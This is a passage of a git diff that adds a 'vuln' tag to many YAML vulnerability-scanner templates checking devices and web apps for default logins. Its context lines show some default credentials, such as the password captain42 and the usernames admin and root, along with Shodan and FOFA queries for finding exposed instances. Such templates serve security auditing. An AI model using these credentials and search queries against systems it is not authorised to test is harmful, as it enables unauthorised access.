+10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:988422585 - tags: caprover,default-login,misconfig + tags: caprover,default-login,misconfig,vuln variables: password: captain42 diff --git a/http/default-logins/chinaunicom/chinaunicom-default-login.yaml b/http/default-logins/chinaunicom/chinaunicom-default-login.yaml index bca8ca09644..4f8d13adca7 100644 --- a/http/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/http/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-798 metadata: max-request: 1 - tags: chinaunicom,default-login + tags: chinaunicom,default-login,vuln http: - raw: diff --git a/http/default-logins/chirpstack/chirpstack-default-login.yaml b/http/default-logins/chirpstack/chirpstack-default-login.yaml index 1ba1cd4262a..cd177f7b88d 100644 --- a/http/default-logins/chirpstack/chirpstack-default-login.yaml +++ b/http/default-logins/chirpstack/chirpstack-default-login.yaml @@ -17,7 +17,7 @@ info: max-request: 1 shodan-query: http.title:"ChirpStack LoRaWAN" fofa-query: title="ChirpStack LoRaWAN" - tags: default-login,chirpstack + tags: default-login,chirpstack,vuln http: - raw: diff --git a/http/default-logins/cobbler/cobbler-default-login.yaml b/http/default-logins/cobbler/cobbler-default-login.yaml index 5b0a9c7b3f0..81ede609cb9 100644 --- a/http/default-logins/cobbler/cobbler-default-login.yaml +++ b/http/default-logins/cobbler/cobbler-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-798 metadata: max-request: 2 - tags: cobbler,default-login,api,seclists + tags: cobbler,default-login,api,seclists,vuln http: - raw: diff --git a/http/default-logins/cobbler/hue-default-credential.yaml b/http/default-logins/cobbler/hue-default-credential.yaml index 5916f206f6d..1392c25d3f7 100644 --- a/http/default-logins/cobbler/hue-default-credential.yaml +++ b/http/default-logins/cobbler/hue-default-credential.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Hue - Welcome to Hue" product: hue vendor: cloudera - tags: hue,default-login,oss,cloudera + tags: hue,default-login,oss,cloudera,vuln http: - raw: diff --git a/http/default-logins/couchdb/couchdb-default-login.yaml b/http/default-logins/couchdb/couchdb-default-login.yaml index 2f1a0f267a8..c72704732fd 100644 --- a/http/default-logins/couchdb/couchdb-default-login.yaml +++ b/http/default-logins/couchdb/couchdb-default-login.yaml @@ -17,7 +17,7 @@ info: fofa-query: app="APACHE-CouchDB" product: couchdb vendor: apache - tags: default-login,couchdb,misconfig + tags: default-login,couchdb,misconfig,vuln http: - raw: diff --git a/http/default-logins/crestron/crestron-airmedia-default-login.yaml b/http/default-logins/crestron/crestron-airmedia-default-login.yaml index 78b5111e66d..acdb4fe7ebe 100644 --- a/http/default-logins/crestron/crestron-airmedia-default-login.yaml +++ b/http/default-logins/crestron/crestron-airmedia-default-login.yaml @@ -12,7 +12,7 @@ info: product: crestron-device vendor: crestron shodan-query: html:"airmedia" - tags: crestron,default-login,iot,misconfig + tags: crestron,default-login,iot,misconfig,vuln variables: username: admin diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index 2c45f4729f9..7566e0432e5 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -14,7 +14,7 @@ info: vendor: crushftp product: crushftp shodan-query: html:"CrushFTP" - tags: default-logins,anonymous,crushftp,default-login + tags: default-logins,anonymous,crushftp,default-login,vuln http: - raw: diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index b8303d0b0d7..a3267b7a0fe 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: crushftp product: crushftp shodan-query: html:"CrushFTP" - tags: default-login,crushftp + tags: default-login,crushftp,vuln http: - raw: diff --git a/http/default-logins/d-link/dlink-centralized-default-login.yaml b/http/default-logins/d-link/dlink-centralized-default-login.yaml index b888f3c62d0..5c281240192 100755 --- a/http/default-logins/d-link/dlink-centralized-default-login.yaml +++ b/http/default-logins/d-link/dlink-centralized-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页" - tags: default-login,dlink + tags: default-login,dlink,vuln http: - raw: diff --git a/http/default-logins/dataease/dataease-default-login.yaml b/http/default-logins/dataease/dataease-default-login.yaml index 0235e56e78a..2cb59489e99 100644 --- a/http/default-logins/dataease/dataease-default-login.yaml +++ b/http/default-logins/dataease/dataease-default-login.yaml @@ -17,7 +17,7 @@ info: vendor: dataease_project product: dataease shodan-query: html:"Dataease" - tags: default-login,dataease + tags: default-login,dataease,vuln http: - method: POST diff --git a/http/default-logins/datagerry/datagerry-default-login.yaml b/http/default-logins/datagerry/datagerry-default-login.yaml index 9ca2dda0bc9..23273b7bae6 100644 --- a/http/default-logins/datagerry/datagerry-default-login.yaml +++ b/http/default-logins/datagerry/datagerry-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"datagerry" - tags: datagerry,default-login + tags: datagerry,default-login,vuln variables: username: "admin" diff --git a/http/default-logins/datahub/datahub-metadata-default-login.yaml b/http/default-logins/datahub/datahub-metadata-default-login.yaml index 2d8f4a994a1..1fabcbb448e 100644 --- a/http/default-logins/datahub/datahub-metadata-default-login.yaml +++ b/http/default-logins/datahub/datahub-metadata-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"DataHub" product: datahub vendor: datahub_project - tags: datahub,default-login + tags: datahub,default-login,vuln http: - raw: diff --git a/http/default-logins/dataiku/dataiku-default-login.yaml b/http/default-logins/dataiku/dataiku-default-login.yaml index 066e735ae62..25c1da4f16c 100644 --- a/http/default-logins/dataiku/dataiku-default-login.yaml +++ b/http/default-logins/dataiku/dataiku-default-login.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"dataiku" product: data_science_studio vendor: dataiku - tags: default-login,dataiku + tags: default-login,dataiku,vuln http: - raw: diff --git a/http/default-logins/dell/dell-dpi-default-login.yaml b/http/default-logins/dell/dell-dpi-default-login.yaml index 420315c48cc..8c3e874d812 100644 --- a/http/default-logins/dell/dell-dpi-default-login.yaml +++ b/http/default-logins/dell/dell-dpi-default-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-798 metadata: max-request: 2 - tags: dell,dpi,rpm,default-login + tags: dell,dpi,rpm,default-login,vuln variables: str: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/default-logins/dell/dell-idrac-default-login.yaml b/http/default-logins/dell/dell-idrac-default-login.yaml index ff911901e0d..565be7bbe0b 100644 --- a/http/default-logins/dell/dell-idrac-default-login.yaml +++ b/http/default-logins/dell/dell-idrac-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 2 - tags: dell,idrac,default-login + tags: dell,idrac,default-login,vuln http: - raw: diff --git a/http/default-logins/dell/dell-idrac9-default-login.yaml b/http/default-logins/dell/dell-idrac9-default-login.yaml index 6dc8e4ee204..2a0fad071d3 100644 --- a/http/default-logins/dell/dell-idrac9-default-login.yaml +++ b/http/default-logins/dell/dell-idrac9-default-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: cwe-798 metadata: max-request: 1 - tags: dell,idrac,default-login + tags: dell,idrac,default-login,vuln http: - raw: diff --git a/http/default-logins/dell/emcecom-default-login.yaml b/http/default-logins/dell/emcecom-default-login.yaml index db0be83b66a..ff82f4c9512 100644 --- a/http/default-logins/dell/emcecom-default-login.yaml +++ b/http/default-logins/dell/emcecom-default-login.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-798 metadata: max-request: 1 - tags: dell,emc,ecom,default-login + tags: dell,emc,ecom,default-login,vuln http: - raw: diff --git a/http/default-logins/deluge/deluge-default-login.yaml b/http/default-logins/deluge/deluge-default-login.yaml index 66a00717cbb..f278dd6d83d 100644 --- a/http/default-logins/deluge/deluge-default-login.yaml +++ b/http/default-logins/deluge/deluge-default-login.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: title:"Deluge" - tags: deluge,default-login + tags: deluge,default-login,vuln http: - raw: diff --git a/http/default-logins/devdojo/devdojo-voyager-default-login.yaml b/http/default-logins/devdojo/devdojo-voyager-default-login.yaml index e5cb2d8c45c..17e7308df30 100644 --- a/http/default-logins/devdojo/devdojo-voyager-default-login.yaml +++ b/http/default-logins/devdojo/devdojo-voyager-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 5 shodan-query: title:"Voyager" - tags: default-login,voyager,devdojo + tags: default-login,voyager,devdojo,vuln variables: username: "admin@admin.com" diff --git a/http/default-logins/dialogic/dialogic-xms-default-login.yaml b/http/default-logins/dialogic/dialogic-xms-default-login.yaml index 906b8482209..97572e89726 100644 --- a/http/default-logins/dialogic/dialogic-xms-default-login.yaml +++ b/http/default-logins/dialogic/dialogic-xms-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Dialogic XMS Admin Console" - tags: dialogic,admin,default-login + tags: dialogic,admin,default-login,vuln http: - raw: diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml index d4a43b618fa..078fb7d4c4f 100644 --- a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -13,7 +13,7 @@ info: max-request: 8 shodan-query: "http.favicon.hash:868509217" fofa-query: "icon_hash=\"868509217\"" - tags: digital-watchdog,default-login,dw-Spectrum + tags: digital-watchdog,default-login,dw-Spectrum,vuln http: - raw: diff --git a/http/default-logins/digitalrebar/digitalrebar-default-login.yaml b/http/default-logins/digitalrebar/digitalrebar-default-login.yaml index f1cec510e96..055aad0811b 100644 --- a/http/default-logins/digitalrebar/digitalrebar-default-login.yaml +++ b/http/default-logins/digitalrebar/digitalrebar-default-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: rackn,digitalrebar,default-login + tags: rackn,digitalrebar,default-login,vuln http: - raw: diff --git a/http/default-logins/dragonfly/dragonfly-default-login.yaml b/http/default-logins/dragonfly/dragonfly-default-login.yaml index 0f0254eca44..12181660c01 100644 --- a/http/default-logins/dragonfly/dragonfly-default-login.yaml +++ b/http/default-logins/dragonfly/dragonfly-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="logo-dragonfly.png" - tags: dragonfly,default-login + tags: dragonfly,default-login,vuln variables: username: "root" diff --git a/http/default-logins/druid/druid-default-login.yaml b/http/default-logins/druid/druid-default-login.yaml index a69c4c3d08f..d6f194afc19 100644 --- a/http/default-logins/druid/druid-default-login.yaml +++ b/http/default-logins/druid/druid-default-login.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 fofa-query: title="druid monitor" - tags: druid,alibaba,default-login + tags: druid,alibaba,default-login,vuln flow: http(1) && http(2) http: diff --git a/http/default-logins/dvwa/dvwa-default-login.yaml b/http/default-logins/dvwa/dvwa-default-login.yaml index 3318d3e4b19..bb6a80a888c 100644 --- a/http/default-logins/dvwa/dvwa-default-login.yaml +++ b/http/default-logins/dvwa/dvwa-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 2 - tags: dvwa,default-login + tags: dvwa,default-login,vuln http: - raw: diff --git a/http/default-logins/easyreport/easyreport-default-login.yaml b/http/default-logins/easyreport/easyreport-default-login.yaml index 7f49cc3ca8f..1271bb7e884 100644 --- a/http/default-logins/easyreport/easyreport-default-login.yaml +++ b/http/default-logins/easyreport/easyreport-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 fofa-query: body="EasyReport-A Sample and Easy to Use Web Reporting System" - tags: easyreport,default-login + tags: easyreport,default-login,vuln http: - raw: diff --git a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml index ff6aa1a5aa8..647349555b3 100644 --- a/http/default-logins/elasticsearch/elasticsearch-default-login.yaml +++ b/http/default-logins/elasticsearch/elasticsearch-default-login.yaml @@ -17,7 +17,7 @@ info: vendor: elastic product: elasticsearch shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 - tags: default-login,elasticsearch + tags: default-login,elasticsearch,vuln http: - raw: diff --git a/http/default-logins/empire/empirec2-default-login.yaml b/http/default-logins/empire/empirec2-default-login.yaml index 2c70d9128e2..714acc006d8 100644 --- a/http/default-logins/empire/empirec2-default-login.yaml +++ b/http/default-logins/empire/empirec2-default-login.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 2 - tags: default-login,empire,c2,intrusive + tags: default-login,empire,c2,intrusive,vuln http: - raw: diff --git a/http/default-logins/emqx/emqx-default-login.yaml b/http/default-logins/emqx/emqx-default-login.yaml index e6a3eb75ad2..f8238d654fc 100644 --- a/http/default-logins/emqx/emqx-default-login.yaml +++ b/http/default-logins/emqx/emqx-default-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:"-670975485" - tags: emqx,default-login + tags: emqx,default-login,vuln variables: username: "admin" diff --git a/http/default-logins/esafenet-cdg-default-login.yaml b/http/default-logins/esafenet-cdg-default-login.yaml index 0e9a519b20f..d6580c68860 100644 --- a/http/default-logins/esafenet-cdg-default-login.yaml +++ b/http/default-logins/esafenet-cdg-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: esafenet product: cdg fofa-query: esafenet - tags: esafenet,cdg,default-login + tags: esafenet,cdg,default-login,vuln http: - method: POST diff --git a/http/default-logins/eurotel/etl3100-default-login.yaml b/http/default-logins/eurotel/etl3100-default-login.yaml index 5eec4b546fd..ef6f1b8b17a 100644 --- a/http/default-logins/eurotel/etl3100-default-login.yaml +++ b/http/default-logins/eurotel/etl3100-default-login.yaml @@ -18,7 +18,7 @@ info: product: etl3100 shodan-query: html:"ETL3100" fofa-query: body="ETL3100" - tags: misconfig,default-login,eurotel + tags: misconfig,default-login,eurotel,vuln http: - raw: diff --git a/http/default-logins/exacqvision/exacqvision-default-login.yaml b/http/default-logins/exacqvision/exacqvision-default-login.yaml index c94f2d237b5..62573d0bbc8 100644 --- a/http/default-logins/exacqvision/exacqvision-default-login.yaml +++ b/http/default-logins/exacqvision/exacqvision-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: cwe-798 metadata: max-request: 1 - tags: exacqvision,default-login + tags: exacqvision,default-login,vuln http: - raw: diff --git a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml index 39d3a42c0ab..8d605ab2db1 100644 --- a/http/default-logins/feiyuxing/feiyuxing-default-login.yaml +++ b/http/default-logins/feiyuxing/feiyuxing-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: feiyuxing product: vec40g fofa-query: title="飞鱼星企业级智能上网行为管理系统" - tags: feiyuxing,default-login,iot + tags: feiyuxing,default-login,iot,vuln http: - raw: diff --git a/http/default-logins/filegator/filegator-default-login.yaml b/http/default-logins/filegator/filegator-default-login.yaml index d40a01532da..4ac6f58b1c8 100644 --- a/http/default-logins/filegator/filegator-default-login.yaml +++ b/http/default-logins/filegator/filegator-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: title:"FileGator" - tags: filegator,default-login,misconfig + tags: filegator,default-login,misconfig,vuln variables: username: "admin" diff --git a/http/default-logins/flir/flir-default-login.yaml b/http/default-logins/flir/flir-default-login.yaml index 4da30f4b144..c70ba8360e7 100644 --- a/http/default-logins/flir/flir-default-login.yaml +++ b/http/default-logins/flir/flir-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 1 - tags: default-login,flir,camera,iot + tags: default-login,flir,camera,iot,vuln http: - raw: diff --git a/http/default-logins/franklin-fueling-default-login.yaml b/http/default-logins/franklin-fueling-default-login.yaml index d96b83b8917..ad05e0545a0 100644 --- a/http/default-logins/franklin-fueling-default-login.yaml +++ b/http/default-logins/franklin-fueling-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: franklinfueling product: ts-550_evo_firmware google-query: inurl:"relay_status.html" - tags: default-login,franklin + tags: default-login,franklin,vuln http: - raw: diff --git a/http/default-logins/frps/frp-default-login.yaml b/http/default-logins/frps/frp-default-login.yaml index a9922932b9d..d37a8171321 100644 --- a/http/default-logins/frps/frp-default-login.yaml +++ b/http/default-logins/frps/frp-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 1 - tags: frp,default-login + tags: frp,default-login,vuln http: - raw: diff --git a/http/default-logins/fuelcms/fuelcms-default-login.yaml b/http/default-logins/fuelcms/fuelcms-default-login.yaml index 0d0f78d070e..8aac2c8098a 100644 --- a/http/default-logins/fuelcms/fuelcms-default-login.yaml +++ b/http/default-logins/fuelcms/fuelcms-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: fuelcms,default-login,oss + tags: fuelcms,default-login,oss,vuln http: - raw: diff --git a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml index db728c11a94..4fe4c49a973 100644 --- a/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml +++ b/http/default-logins/fuji-xerox/fuji-xerox-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: fujixerox product: apeosport-v_c3375 fofa-query: '"prop.htm" && "docucentre"' - tags: default-login,fuji,fuji-xerox,printer + tags: default-login,fuji,fuji-xerox,printer,vuln http: - raw: diff --git a/http/default-logins/geoserver/geoserver-default-login.yaml b/http/default-logins/geoserver/geoserver-default-login.yaml index f8e6295a10f..03af2cc4973 100644 --- a/http/default-logins/geoserver/geoserver-default-login.yaml +++ b/http/default-logins/geoserver/geoserver-default-login.yaml @@ -18,7 +18,7 @@ info: fofa-query: app="GeoServer" product: geoserver vendor: geoserver - tags: geoserver,default-login + tags: geoserver,default-login,vuln http: - raw: diff --git a/http/default-logins/gitblit/gitblit-default-login.yaml b/http/default-logins/gitblit/gitblit-default-login.yaml index 3b922aa529b..16f578e6833 100644 --- a/http/default-logins/gitblit/gitblit-default-login.yaml +++ b/http/default-logins/gitblit/gitblit-default-login.yaml @@ -16,7 +16,7 @@ info: vendor: gitblit product: gitblit shodan-query: title:"Gitblit" - tags: gitblit,default-login + tags: gitblit,default-login,vuln http: - raw: diff --git a/http/default-logins/gitlab/gitlab-weak-login.yaml b/http/default-logins/gitlab/gitlab-weak-login.yaml index b5bdc5afb57..38b84b8c591 100644 --- a/http/default-logins/gitlab/gitlab-weak-login.yaml +++ b/http/default-logins/gitlab/gitlab-weak-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"GitLab" product: gitlab vendor: gitlab - tags: gitlab,default-login + tags: gitlab,default-login,vuln http: - raw: diff --git a/http/default-logins/glpi/glpi-default-login.yaml b/http/default-logins/glpi/glpi-default-login.yaml index a6073333e55..797cf2ac31f 100644 --- a/http/default-logins/glpi/glpi-default-login.yaml +++ b/http/default-logins/glpi/glpi-default-login.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-798 metadata: max-request: 2 - tags: glpi,default-login + tags: glpi,default-login,vuln http: - raw: diff --git a/http/default-logins/goip-default-login.yaml b/http/default-logins/goip-default-login.yaml index 5934241a12e..dbadf5f535f 100644 --- a/http/default-logins/goip-default-login.yaml +++ b/http/default-logins/goip-default-login.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 12 shodan-query: 'HTTP/1.0 401 Please Authenticate\r\nWWW-Authenticate: Basic realm="Please Login"' - tags: default-login,goip,gsm + tags: default-login,goip,gsm,vuln http: - raw: diff --git a/http/default-logins/google/google-earth-dlogin.yaml b/http/default-logins/google/google-earth-dlogin.yaml index a8d4a737313..a6d43222cc4 100644 --- a/http/default-logins/google/google-earth-dlogin.yaml +++ b/http/default-logins/google/google-earth-dlogin.yaml @@ -21,7 +21,7 @@ info: metadata: max-request: 1 shodan-query: title:"GEE Server" - tags: default-login,google-earth + tags: default-login,google-earth,vuln http: - raw: diff --git a/http/default-logins/gophish/gophish-default-login.yaml b/http/default-logins/gophish/gophish-default-login.yaml index eb9dff30ebc..64b1275b085 100644 --- a/http/default-logins/gophish/gophish-default-login.yaml +++ b/http/default-logins/gophish/gophish-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 2 - tags: gophish,default-login + tags: gophish,default-login,vuln http: - raw: diff --git a/http/default-logins/grafana/grafana-default-login.yaml b/http/default-logins/grafana/grafana-default-login.yaml index 73887d3137d..6a7056afd90 100644 --- a/http/default-logins/grafana/grafana-default-login.yaml +++ b/http/default-logins/grafana/grafana-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"Grafana" product: grafana vendor: grafana - tags: grafana,default-login + tags: grafana,default-login,vuln http: - raw: diff --git a/http/default-logins/guacamole/guacamole-default-login.yaml b/http/default-logins/guacamole/guacamole-default-login.yaml index 0e641e4e90d..73a44a9e28a 100644 --- a/http/default-logins/guacamole/guacamole-default-login.yaml +++ b/http/default-logins/guacamole/guacamole-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: guacamole,default-login + tags: guacamole,default-login,vuln http: - raw: diff --git a/http/default-logins/hongdian/hongdian-default-login.yaml b/http/default-logins/hongdian/hongdian-default-login.yaml index 6d88c7fee3d..a39a1e4bd9c 100644 --- a/http/default-logins/hongdian/hongdian-default-login.yaml +++ b/http/default-logins/hongdian/hongdian-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 4 - tags: hongdian,default-login + tags: hongdian,default-login,vuln http: - raw: diff --git a/http/default-logins/hortonworks/smartsense-default-login.yaml b/http/default-logins/hortonworks/smartsense-default-login.yaml index 133b9ff56d1..3fb20b62edc 100644 --- a/http/default-logins/hortonworks/smartsense-default-login.yaml +++ b/http/default-logins/hortonworks/smartsense-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: hortonworks,smartsense,default-login + tags: hortonworks,smartsense,default-login,vuln http: - raw: diff --git a/http/default-logins/hp/hp-printer-default-login.yaml b/http/default-logins/hp/hp-printer-default-login.yaml index 9c8cf4d84d4..01bb31e04ab 100644 --- a/http/default-logins/hp/hp-printer-default-login.yaml +++ b/http/default-logins/hp/hp-printer-default-login.yaml @@ -12,7 +12,7 @@ info: verified: true shodan-query: html:"hp/device/SignIn/Index" max-request: 2 - tags: hp,printer,default-login + tags: hp,printer,default-login,vuln http: - raw: diff --git a/http/default-logins/hp/hp-switch-default-login.yaml b/http/default-logins/hp/hp-switch-default-login.yaml index 4247347f7a1..8e05b825f58 100644 --- a/http/default-logins/hp/hp-switch-default-login.yaml +++ b/http/default-logins/hp/hp-switch-default-login.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 fofa-query: HP 1820-8G Switch J9979A - tags: default-login,hp + tags: default-login,hp,vuln http: - raw: diff --git a/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml b/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml index c08d6ce9580..59c4552551a 100644 --- a/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml +++ b/http/default-logins/huawei/huawei-HG532e-default-router-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"HG532e" product: hg532e vendor: huawei - tags: default-login,huawei + tags: default-login,huawei,vuln http: - raw: diff --git a/http/default-logins/hybris/hybris-default-login.yaml b/http/default-logins/hybris/hybris-default-login.yaml index 2c7ccb32b45..5bf1b0d668f 100644 --- a/http/default-logins/hybris/hybris-default-login.yaml +++ b/http/default-logins/hybris/hybris-default-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: title:"Hybris" product: hybris vendor: sap - tags: default-login,hybris + tags: default-login,hybris,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-dcbc-default-login.yaml b/http/default-logins/ibm/ibm-dcbc-default-login.yaml index 8d638f2078b..71bad78abc5 100644 --- a/http/default-logins/ibm/ibm-dcbc-default-login.yaml +++ b/http/default-logins/ibm/ibm-dcbc-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "title=\"Decision Center | Business Console\"" - tags: ibm,default-login,decision-center + tags: ibm,default-login,decision-center,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-dcec-default-login.yaml b/http/default-logins/ibm/ibm-dcec-default-login.yaml index 4893a520914..9ea4be0299c 100644 --- a/http/default-logins/ibm/ibm-dcec-default-login.yaml +++ b/http/default-logins/ibm/ibm-dcec-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "html=\"Decision Center Enterprise console\"" - tags: ibm,default-login,decision-center + tags: ibm,default-login,decision-center,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-dsc-default-login.yaml b/http/default-logins/ibm/ibm-dsc-default-login.yaml index 15925c64979..0e10136d03b 100644 --- a/http/default-logins/ibm/ibm-dsc-default-login.yaml +++ b/http/default-logins/ibm/ibm-dsc-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: "title:\"Rule Execution Server\"" - tags: ibm,default-login,decision-server + tags: ibm,default-login,decision-server,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-hmc-default-login.yaml b/http/default-logins/ibm/ibm-hmc-default-login.yaml index 0b164f7dc6a..fb78069cab3 100644 --- a/http/default-logins/ibm/ibm-hmc-default-login.yaml +++ b/http/default-logins/ibm/ibm-hmc-default-login.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:262502857 - tags: default-login,ibm,hmc + tags: default-login,ibm,hmc,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-mqseries-default-login.yaml b/http/default-logins/ibm/ibm-mqseries-default-login.yaml index a610496d102..f1e0226d907 100644 --- a/http/default-logins/ibm/ibm-mqseries-default-login.yaml +++ b/http/default-logins/ibm/ibm-mqseries-default-login.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-522 metadata: max-request: 3 - tags: ibm,default-login + tags: ibm,default-login,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-security-verify-default-login.yaml b/http/default-logins/ibm/ibm-security-verify-default-login.yaml index 4d00aa96f37..c88fca16804 100644 --- a/http/default-logins/ibm/ibm-security-verify-default-login.yaml +++ b/http/default-logins/ibm/ibm-security-verify-default-login.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: title:"IBM Security Verify Access" - tags: ibm,default-login + tags: ibm,default-login,vuln http: - raw: diff --git a/http/default-logins/ibm/ibm-storage-default-credential.yaml b/http/default-logins/ibm/ibm-storage-default-credential.yaml index c59bfc9e2a4..cba2000cc57 100644 --- a/http/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/http/default-logins/ibm/ibm-storage-default-credential.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: default-login,ibm,storage + tags: default-login,ibm,storage,vuln http: - raw: diff --git a/http/default-logins/ibm/imm-default-login.yaml b/http/default-logins/ibm/imm-default-login.yaml index 6d524cc4950..b17cf7ed954 100644 --- a/http/default-logins/ibm/imm-default-login.yaml +++ b/http/default-logins/ibm/imm-default-login.yaml @@ -19,7 +19,7 @@ info: fofa-query: "integrated management module" product: integrated_management_module vendor: ibm - tags: imm,ibm,default-login + tags: imm,ibm,default-login,vuln http: - method: POST diff --git a/http/default-logins/idemia/idemia-biometrics-default-login.yaml b/http/default-logins/idemia/idemia-biometrics-default-login.yaml index d6e14aa0587..58d510c3f73 100644 --- a/http/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/http/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -19,7 +19,7 @@ info: shodan-query: title:"IDEMIA" product: sigma_wide vendor: idemia - tags: idemia,biometrics,default-login + tags: idemia,biometrics,default-login,vuln http: - raw: diff --git a/http/default-logins/iptime/iptime-default-login.yaml b/http/default-logins/iptime/iptime-default-login.yaml index 8f023241076..14968cad22a 100644 --- a/http/default-logins/iptime/iptime-default-login.yaml +++ b/http/default-logins/iptime/iptime-default-login.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-522 metadata: max-request: 1 - tags: iptime,default-login + tags: iptime,default-login,vuln http: - raw: diff --git a/http/default-logins/ispconfig/ispconfig-admin-default-login.yaml b/http/default-logins/ispconfig/ispconfig-admin-default-login.yaml index 0523eae481d..4db56589887 100644 --- a/http/default-logins/ispconfig/ispconfig-admin-default-login.yaml +++ b/http/default-logins/ispconfig/ispconfig-admin-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 9 shodan-query: "http.title:\"ispconfig\"" - tags: default-login,ispconfig + tags: default-login,ispconfig,vuln http: - raw: diff --git a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml index 891b52b99f6..99fd6465ac7 100644 --- a/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml +++ b/http/default-logins/ispconfig/ispconfig-hcp-default-login.yaml @@ -14,7 +14,7 @@ info: vendor: ispconfig product: ispconfig shodan-query: title:"ISPConfig" http.favicon.hash:483383992 - tags: ispconfig,hsp,default-login + tags: ispconfig,hsp,default-login,vuln http: - raw: diff --git a/http/default-logins/jboss/jboss-jbpm-default-login.yaml b/http/default-logins/jboss/jboss-jbpm-default-login.yaml index 48a8cc62e22..d6e4629c7fd 100644 --- 